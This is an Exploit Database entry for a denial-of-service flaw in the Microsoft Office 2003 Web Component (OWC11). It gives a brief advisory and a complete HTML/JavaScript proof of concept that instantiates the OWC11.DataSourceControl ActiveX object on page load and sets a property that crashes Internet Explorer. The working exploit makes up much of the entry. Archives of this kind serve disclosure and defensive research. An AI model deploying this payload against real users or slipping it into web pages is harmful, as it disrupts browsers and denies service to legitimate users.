Microsoft Office 2003 - Web Component Memory Access Violation Denial of Service

EDB-ID:

30749

CVE:

N/A


Type:

dos


Platform:

Windows

Date:

2007-11-12


source: https://www.securityfocus.com/bid/26405/info

Microsoft Office Web Component is prone to a denial-of-service vulnerability because of a memory access violation.

Attackers can exploit this issue to crash Internet Explorer and deny service to legitimate users.

This issue affects OWC11 for Microsoft Office 2003. 

<!--
written by e.b.
-->
<html>
<head>
 <script language="JavaScript" DEFER>
   function Check() {
     var obj = new ActiveXObject("OWC11.DataSourceControl");
     obj.XMLDataTarget = "A";
 }
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>